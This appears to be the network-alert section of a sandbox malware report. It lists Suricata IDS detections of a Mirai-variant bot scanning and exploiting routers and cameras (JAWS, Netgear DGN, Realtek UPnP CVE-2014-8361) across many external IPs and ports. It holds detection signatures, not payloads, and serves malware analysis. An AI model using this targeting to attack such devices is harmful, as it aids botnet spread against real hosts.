                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:35314 -> 99.162.112.187:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33476 -> 46.14.252.194:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55266 -> 144.94.116.224:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55266 -> 144.94.116.224:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51946 -> 160.64.200.250:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50436 -> 216.190.220.54:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:45992 -> 83.191.83.234:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50436 -> 216.190.220.54:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:52382 -> 187.208.34.38:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49924 -> 50.191.49.171:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:50074 -> 128.100.55.44:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33858 -> 14.239.128.170:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:48966 -> 101.172.124.155:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44882 -> 181.245.251.146:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59536 -> 70.1.42.222:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59138 -> 25.203.243.102:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54204 -> 161.159.158.251:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49352 -> 189.47.162.68:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38960 -> 102.154.96.78:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:39810 -> 157.80.252.25:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35422 -> 142.225.53.129:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:45252 -> 43.10.138.186:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47792 -> 152.156.223.170:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32920 -> 43.136.192.62:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41216 -> 212.175.190.28:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39176 -> 19.149.226.178:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37904 -> 164.194.135.238:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54388 -> 177.141.44.231:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:56896 -> 145.217.58.149:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53360 -> 153.240.186.210:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35796 -> 84.207.247.119:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56512 -> 56.75.49.173:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36408 -> 157.88.62.35:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56512 -> 56.75.49.173:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51940 -> 144.80.221.222:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35012 -> 45.231.135.189:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35624 -> 26.112.167.54:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48190 -> 150.49.139.129:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35624 -> 26.112.167.54:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52982 -> 32.160.241.63:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53086 -> 63.90.139.102:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48332 -> 197.204.137.58:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52542 -> 146.136.103.163:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40170 -> 27.18.230.139:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54866 -> 212.19.173.191:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52578 -> 142.230.94.50:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:53898 -> 140.49.192.11:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:32870 -> 53.223.145.174:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54324 -> 24.168.121.6:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:54324 -> 24.168.121.6:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:36744 -> 92.38.181.87:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:50814 -> 20.138.27.159:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47554 -> 146.20.246.188:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:53488 -> 202.88.157.165:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57764 -> 73.90.183.63:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:57764 -> 73.90.183.63:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49822 -> 70.136.186.81:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46456 -> 149.193.148.34:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32996 -> 101.15.65.84:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49194 -> 68.42.36.210:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49576 -> 37.133.196.204:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49890 -> 152.96.212.208:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59258 -> 55.139.42.174:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59030 -> 68.104.71.243:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50418 -> 74.121.250.48:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55090 -> 48.90.206.169:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34970 -> 34.86.117.21:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48206 -> 209.39.207.150:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51870 -> 90.153.54.244:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49894 -> 112.194.38.63:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:49894 -> 112.194.38.63:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53304 -> 182.227.110.28:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32856 -> 191.77.140.153:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:33120 -> 106.23.130.140:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45614 -> 135.20.150.219:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54560 -> 108.8.51.27:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:55738 -> 177.124.131.210:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50002 -> 77.121.98.247:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:35130 -> 38.189.25.217:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36822 -> 184.220.87.241:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44440 -> 179.184.84.34:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54304 -> 94.56.235.17:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:39156 -> 151.36.87.52:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:34596 -> 128.12.140.246:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43626 -> 214.111.203.47:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54840 -> 109.222.95.21:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38892 -> 142.115.135.32:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53672 -> 67.237.240.84:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51804 -> 159.189.182.100:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:58842 -> 73.149.43.253:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:42796 -> 210.76.1.253:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48828 -> 101.130.93.192:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55498 -> 182.198.195.130:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:56482 -> 133.9.23.21:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55498 -> 182.198.195.130:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:41334 -> 73.18.143.204:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38138 -> 48.209.236.164:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:50776 -> 52.35.25.20:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:38892 -> 142.115.135.32:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:51362 -> 210.92.63.90:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54190 -> 26.165.219.86:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33780 -> 222.96.144.16:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41854 -> 98.125.56.208:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46434 -> 190.123.58.154:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:43516 -> 39.11.173.155:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53654 -> 48.137.212.42:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40688 -> 219.63.223.16:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49594 -> 199.23.101.88:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:50600 -> 125.230.87.138:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:41896 -> 13.194.80.189:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50486 -> 73.177.193.220:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:40688 -> 219.63.223.16:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43486 -> 157.231.213.112:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37312 -> 186.93.85.188:7574
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:43486 -> 157.231.213.112:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32860 -> 11.48.182.3:8080
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:33780 -> 222.96.144.16:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53778 -> 162.60.224.62:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:55684 -> 1.213.1.223:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:55996 -> 181.78.116.23:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:50228 -> 81.210.236.238:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45758 -> 19.251.187.157:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:50262 -> 202.51.201.37:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40718 -> 178.72.204.4:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58078 -> 96.81.159.236:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53882 -> 61.221.193.115:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44922 -> 75.14.247.30:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37876 -> 70.159.0.172:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:39304 -> 181.25.123.235:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59254 -> 130.123.72.225:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34086 -> 215.189.147.100:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58046 -> 76.231.140.115:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:49044 -> 173.224.150.117:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49434 -> 41.161.214.192:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37408 -> 58.25.214.119:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:57396 -> 132.109.208.103:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44338 -> 189.229.175.122:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:34468 -> 41.43.78.104:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33202 -> 153.157.254.30:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49354 -> 71.164.37.212:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55692 -> 182.149.46.3:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59020 -> 25.40.34.74:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32916 -> 15.252.209.178:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:32916 -> 15.252.209.178:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46748 -> 66.99.16.40:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34982 -> 47.104.135.117:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34982 -> 47.104.135.117:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53368 -> 94.23.166.65:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:51418 -> 177.37.167.95:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51374 -> 193.34.214.53:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51374 -> 193.34.214.53:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46280 -> 1.9.37.1:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59994 -> 220.129.74.204:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48762 -> 138.35.154.46:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57340 -> 163.191.18.235:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38750 -> 118.151.114.80:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55846 -> 116.48.214.197:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43258 -> 183.178.42.191:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53194 -> 23.202.41.211:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46142 -> 50.129.165.8:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48514 -> 109.3.50.60:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38104 -> 50.210.105.42:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45786 -> 60.220.129.51:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43718 -> 215.101.251.205:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49658 -> 2.144.236.217:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:32884 -> 116.175.89.26:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34456 -> 18.5.160.184:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60098 -> 102.60.227.138:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55934 -> 84.119.107.118:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:60098 -> 102.60.227.138:80
